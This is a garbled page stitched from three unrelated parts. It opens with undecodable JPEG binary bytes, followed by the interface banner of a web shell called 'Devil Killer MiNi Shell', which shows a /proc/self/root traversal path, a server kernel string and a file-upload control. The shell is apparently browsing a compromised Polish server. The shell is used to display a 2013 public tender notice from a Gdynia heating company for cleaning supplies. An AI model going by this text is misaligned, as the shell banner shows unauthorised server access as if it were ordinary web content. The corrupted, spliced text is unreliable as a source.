JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/104785-N-2013.html

<p class="kh_header"><b>Gdynia: Środki i artykuły czystości</b><br>
<b>Numer ogłoszenia: 104785 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowe Przedsiębiorstwo Energetyki Cieplnej  Sp. z o.o. , ul. Opata Hackiego 14, 81-213 Gdynia, woj. pomorskie, tel. 58 627 38 18, faks 58 663 16 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opecgdy.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Środki i artykuły czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BIOPREPARAT EXPEL - ŚRODEK ODSTRASZACZ PIES I KOT OPAKOWANIE 500 ML LUB INNY W PEŁNI RÓWNOWAŻNY 	szt.	3
GASTRONOMICZNE PAPIEROWE SERWETKI SKŁADANE, GŁADKIE, KOLOROWE W OPAK. PO 20 SZT	opak.	200
KIJE METALOWE W OTULINIE PLASTIKOWEJ Z GWINTEM DO MIOTEŁ TYPU MOP O DŁUGOŚCI TRZONKA 1.20 M. RÓŻNE KOLORY	szt.	10
KOŃCÓWKI SZNURKOWE BAWEŁNIANE TYPU MOP Z UCHWYTEM GWINTOWANYM MIN 270 G. DŁ. SZNURKA MIN. 25 CM	szt.	25
KOSTKA DO WC 40 G O RÓŻNYCH ZAPACHACH - DEZYNFEKUJĄCA I USUWAJĄCA KAMIEŃ WKŁAD ZAPASOWY O WIELKOŚCI PASUJĘCEJ DO KOSZYCZKA Z POZ. PLANU 13989	szt.	40
KOSTKA DO WC 40 G W KOSZYCZKU	szt.	150
KOSZ NA ŚMIECI PLAST. POJEMNOŚĆ 25 L. RÓŻNE KOLORY	szt.	26
KOSZ NA ŚMIECI, BIUROWY, METALOWY, KWADRATOWY Z PRZYKRYWKĄ, POJEMNOŚĆ 10L	szt.	3
KREM DO RĄK 50ML.	szt.	450
KREM OCHRONNY DO RĄK 250 ML. BEZZAPACHOWY DO OGÓLNEGO STOSOWANIA	szt.	220
KREM OCHRONNY NAWILŻAJĄCY CYTRYNOWY DO RĄK. OP. POJ. 250 ML	szt.	1025
KREM OCHRONNY NAWILŻAJĄCY DO RĄK. CYTRYNOWY. OP. POJ. 50 ML	szt.	2390
MIOTŁA DREWNIANA Z WŁOSIA MIĘKKIEGO MIESZANEGO, KIJ DŁUGOŚCI OK. 120 CM, CZĘŚĆ ZAMIATAJĄCA O SZEEROKOŚCI OK. 30 CM	szt.	22
MIOTŁA DREWNIANA, KIJ DŁUGOŚCI OK.120 CM, O CZĘŚCI ZAMIATAJĄCEJ O SZEROKOŚCI OK. 30 CM Z WŁÓKNA SZTUCZNEGO, MIĘKKIEGO	szt.	127
MLECZKO DO CZYSZCZENIA POWIERZCHNI ZMYWALNYCH. CYTRYNOWE. OP. POJ. 0.5 L	szt.	111
MYDŁO DO DOZOWNIKA TORK S-BOX W PŁYNIE MEVON 66 WŁOSY I CIAŁO BUTELKA PLASTIKOWA POJ. 1 L (NR ART. 400601) LUB INNY W PEŁNI RÓWNOWAŻNY W ZAKRESIE PODANYCH PARAMETRÓW	szt.	843
MYDŁO TOALETOWE. 100 G	szt.	12937
MYDŁO W PŁYNIE O ZAPACHU KWIATOWYM NAWILŻAJĄCE. OP. POJ. 5 L	szt.	35
OPAKOWANIA Z TWORZYW SZTUCZNYCH (WORKI PE) POJ. 60 L ILOŚĆ W OP. 50 SZT.	opak.	1
PAPIER TOALETOWY CELULOZOWY WYTŁACZANY 2 WARSTWOWY BIAŁY 180 LISTKÓW (Z TOLERANCJĄ + - 5 LISTKÓW)	szt.	10282
PAPIER TOALETOWY T-TORK MINI PLUS DO DOZOWNIKA T-BOX MINI CELULOZOWY DWUWARSTWOWY BIAŁY Z LISTKAMI DŁUGOŚĆ ROLI NIE MNIEJ NIŻ 170 METRÓW SZEROKOŚĆ 10 CM ŚREDNICA FI 18,5 CM - LUB INNY W PEŁNI RÓWNOWAŻNY W ZAKRESIE PODANYCH PARAMETRÓW	szt.	2953
PASTA BHP - ŚCIERNA USUWAJĄCA TRUDNO ZMYWALNE ZABRUDZENIA 500G	szt.	2970
PASTA BHP BIAŁA MYDLANA 0.5 KG	szt.	1393
PASTA DO PCV KREM. OP. POJ. 0.5 KG	szt.	7
PŁYN ODKAŻAJĄCY DO DEZYNFEKCJI WC. CYTRYNOWY. OP. POJ. 750 ML	szt.	73
PŁYN DO CZYSZCZENIA EKRANÓW MONITORÓW I TELEWIZORÓW POJ. OPAKOWANIA 120-150 ML	szt.	64
PŁYN DO MYCIA NACZYŃ CYTRYNOWY. OP. POJ. 1 L	szt.	77
PŁYN DO MYCIA NACZYŃ CYTRYNOWY, OP. POJ. 5 L.	szt.	58
PŁYN DO MYCIA NACZYŃ MIĘTOWY. LIMONOWY. OP. POJ. 5 L	szt.	13
PŁYN DO MYCIA NACZYŃ MIĘTOWY. OP. POJ. 0.5 L	szt.	10
PŁYN DO MYCIA SZYB. BUTELKA ZE SPRYSKIWACZEM. OP. POJ. 0,5 L	szt.	93
PŁYN DO MYCIA SZYB. BUTELKA ZE SPRYSKIWACZEM. OP. POJ. 750 ML	szt.	28
PŁYN DO MYCIA SZYB. OP. POJ. 5 L	szt.	2
PŁYN DO UDRAŻNIANIA RUR KANALIZACYJNYCH. OP. POJ. 0.5 L	szt.	45
PŁYN DO WC DEZYNFEKUJĄCY. OP. POJ. 500 ML	szt.	31
PŁYN OWADOBÓJCZY W ATOMIZERZE - SKUTECZNIE ODSTRASZAJĄCY KOMARY, KLESZCZE I NIEPODRAŻNIAJĄCY SKÓRY. PRZEBADANY DERMATOLOGICZNIE, POSIADAJĄCY ATEST PZH. POJEMNOŚĆ 100 ML	szt.	5
PŁYN SPRAY 750ML - USUWAJĄCY KAMIEŃ, RDZĘ, OSAD	szt.	15
PŁYN UNIWERSALNY CYTRYNOWY. POMARAŃCZOWY DO CZYSZCZENIA POWIERZCHNI ZMYWALNYCH. CYTRYNOWY. OP. POJ. 0.5 L	szt.	206
PŁYN USUWAJĄCY KAMIEŃ I RDZĘ. OP. POJ. 450 ML	szt.	183
PREPARAT GRZYBOBÓJCZY W PLASTIKOWEJ BUTELCE O POJ. 1 L	szt.	1
PROSZEK DO PRANIA FIRAN. OP. 600 G	szt.	200
PROSZEK DO PRANIA UNIWERSALNY. OP. 600 G	szt.	4193
PROSZEK DO SZOROWANIA URZĄDZEŃ SANITARNYCH. OP. 500 G	szt.	54
RĘCZNIK BAWEŁNIANY FROTTE DWUSTRONNY. O WYM. 100X50 CM GRAMATURA MIN. 450 G  M2	szt.	821
RĘCZNIK PAPIEROWY MINI-TORK PLUS DO DOZOWNIKA MINI-BOX CELULOZOWY DWUWARSTWOWY BIAŁY DŁUGOŚĆ ROLI NIE MNIEJ NIŻ 70 METRÓW, SZER. 21,5 CM, ŚREDNICA NIE MNIEJ NIŻ FI 12,5 DO14 CM - LUB INNY W PEŁNI RÓWNOWAŻNY W ZAKRESIE PODANYCH PARAMETRÓW	szt.	3607
RĘCZNIK PAPIEROWY W LISTKACH ZZ (4000 LISTKÓW) 40 G M2 BIAŁY	karton	130
SZCZOTKA DO RĄK W OPRAWIE PLASTIKOWEJ. WŁÓKNO SYNTETYCZNE. JEDNOSTRONNA	szt.	843
SZCZOTKA DO RĄK DWUSTRONNA W OPRAWIE DREWNIANEJ	szt.	60
SZUFELKA PLASTIKOWA Z KRÓTKIM TRZONKIEM	 szt.	25
ŚCIĄGACZKA DO WODY Z POSADZEK SZER. 25 CM Z METALOWĄ RAMĄ Z TRZONKIEM DREWNIANYM DO MOCOWANIA ŚCIĄGACZKI DŁ. MIN 130cm	szt.	13
ŚCIĄGACZKA DO WODY Z POSADZEK SZER. 30 CM Z METALOWĄ RAMĄ Z TRZONKIEM DREWNIANYM DO MOCOWANIA ŚCIĄGACZKI DŁ. MIN 130cm	szt.	4
ŚCIĄGACZKI WODY Z POSADZEK SZER. 45 CM Z METALOWĄ RAMĄ Z TRZONKIEM DREWNIANYM DO MOCOWANIA ŚCIĄGACZEK, DŁ. MIN. 130CM	szt.	9
ŚCIĄGACZKI WODY Z POSADZEK SZER. 75 CM Z METALOWA RAMĄ Z TRZONKIEM DREWNIANYM DO MOCOWANIA ŚCIĄGACZEK, DŁ. MIN. 130CM	szt.	43
ŚCIERECZKI DO NACZYŃ MAŁE, KOLOROWE	szt.	40
ŚCIERKA DO KURZU MATERIŁ WISKOZA 90G M2, RÓŻNE KOLORY	szt.	113
ŚCIERKA BAWEŁNIANA ZWYKŁA O WYM. 100X50 CM GRAMATURA MIN 80 G	szt.	758
ŚCIERKA DO PODŁÓG DOBRZE WCHŁANIAJĄCA PŁYNY MATERIAŁ WŁÓKNINA 250 G. OK. 75% BAWEŁNY KOLOR JASNO SZARY WYMIARY 50x60 CM	szt.	116
ŚRODEK DO CZYSZCZENIA I PIELĘGNACJI MEBLI. DO WSZYSTKICH POWIERZCHNI. W AEROZOLU. OP. POJ. 250 ML	szt.	12
ŚRODEK DO CZYSZCZENIA URZĄDZEŃ I ARMATURY SANITARNEJ, USUWAJACY KAMIEŃ I RDZĘ, OP. 500 ML	szt.	85
ŚRODEK DO UDRAŻNIANIA RUR KANALIZACYJNYCH - OP. POJ. 1 L	szt.	12
ŚRODEK OWADOBÓJCZY W AEROZOLU. OP. 300 ML	szt.	24
TABLETKI DO ZMYWARKI 28 SZT.	szt.	10
TABLETKI OCZYSZCZAJĄCE DO EKSPRESÓW KAWOWYCH 10 TABLETEK W OPAK	opak.	2
WIADRA PLASTIKOWE. POJ. 12 L. RÓŻNE KOLORY	szt.	28
WIADRO BUDOWLANE 16L Z NANIESIONĄ WEWNATRZ PODZIAŁKĄ, MATERIAŁ TWORZYWO SZTUCZNE O BARDZO DUŻEJ ELASTYCZNOŚCI, RACZKA METALOWA	szt.	20
WIADRO GLAZURNICZE DO MYCIA PŁYTEK PO FUGOWANIU POJ. MIN 16 L Z KÓŁKAMI I KRATKĄ ORAZ Z ROLKAMI, MATERIAŁ: TWORZYWO SZTUCZNE - POLIPROPYLEN, UCHWYT Z TWORZYWA; ROLKI PODWÓJNE Z TWORZYWA SZTUCZNEGO DO MOCOWANIA NA WIADRZE; DO USUWANIA NADMIARU WODY Z PACĄ 	szt.	1
WIADRO OCYNK 12L	szt.	13
WIADRO PLASTIK. POJ. 10 L. RÓŻNE KOLORY	szt.	36
WORKI FOLIOWE NA ŚMIECI 35L Z FOLII HDPE OPAKOWANIE (PAKIET, ROLKA) 50 SZTUK	opak.	12
WORKI FOLIOWE 160 L LDPE	szt.	650
WORKI FOLIOWE 240L LDPE	szt.	530
WORKI FOLIOWE NA GRUZ, 120 L OPAK. 10 SZT.	opak.	181
WORKI FOLIOWE NA ŚMIECI 120 L Z FOLII LDPE OPAKOWANIE (ROLKA, PAKIET) 25 SZTUK	opak.	119
WORKI FOLIOWE NA ŚMIECI 60L Z FOLII HDPE OPAKOWANIE (PAKIET, ROLKA) 50 SZTUK	opak.	325
WORKI NA ŚMIECI 60L OP.50SZT.	szt.	18
WORKI PAPIEROWE DO ODKURZACZA BOSCH TYP GAS 12-50 RF (NR KAT. 0 601 975 903) LUB INNE ZAMIENNE	szt.	10
WORKI PAPIEROWE DO ODKURZACZA EINHELL 1250 1	szt.	20
WORKI PAPIEROWE DO ODKURZACZA TYPU ELEKTROLUX XIO Z1027	kpl.	3
WORKI PLASTIKOWE 60 L LDPE	szt.	350
ZAMIATACZ DREWNIANY. DŁ. 50 CM. WŁÓKNO PCV (TZW. MIOTŁA ULICZNICA Z TRZONKIEM)	szt.	69
ZESTAW WIADRO TYPU MOP. RÓŻNE KOLORY MOP Z TRZONKIEM I WKRĘCANĄ KOŃCÓWKĄ SZNUROWĄ- BAWEŁNA.  MIN 270 G. DŁ. SZNURKA MIN 25 CM	kpl.	124
ZESTAW ZMIOTKA Z DŁUGIM TRZONKIEM I SZUFELKĄ - PLASTIKOWE RÓŻNE KOLORY (TZW.LENIUCH)	kpl.	15
ZMIOTKA PLASTIKOWA RECZNA, MAŁA	szt.	67
ZMYWAK KUCHENNY UNIWERSALNY. GĄBKA	szt	117
ŻEL DO MYCIA RĄK. USUWAJĄCY SMARY I INNE TRUDNO USUWALNE ZABRUDZENIA. OP. 0.5 KG	szt.	1421.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 24.96.00.00-1, 33.76.10.00-2, 39.83.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do przedłożenia razem z ofertą wadium przetargowego w wysokości 1.000,00 zł (słownie: jeden tysiąc złotych 0/100); Wadium musi obejmować okres związania ofertą.
Wadium może być wnoszone w następujących formach: 
- pieniądzu, 
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych, 
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto zamawiającego: PeKaO S.A. III/O Gdynia, Nr rachunku: 44 1240 3523 1111 0000 4334 8901;
Wadium wnoszone w poręczeniach lub gwarancjach należy złożyć w oryginale wraz ze składaną ofertą. 
Za wniesienie wadium w formie pieniężnej zamawiający uważa wadium, które w terminie do dnia 21.06.2013r. do godz. 11:00 znajdzie się na rachunku zamawiającego.
Kserokopię dowodu wniesienia wadium należy dołączyć do oferty.
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie;
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Poręczenia bankowe, gwarancje bankowe i ubezpieczeniowe, poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości muszą nieodwołalnie i bezwarunkowo zobowiązywać Poręczyciela lub Gwaranta do zapłaty kwoty pieniężnej w ciągu 14 dni na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22. ust. 1, którego treść stanowi załącznik nr 4 do siwz;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22. ust. 1, którego treść stanowi załącznik nr 4 do siwz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22. ust. 1, którego treść stanowi załącznik nr 4 do siwz;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22. ust. 1, którego treść stanowi załącznik nr 4 do siwz;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie, a ocena spełnienia warunku udziału w postępowaniu dokonana zostanie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu z art. 22. ust. 1, którego treść stanowi załącznik nr 4 do siwz;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
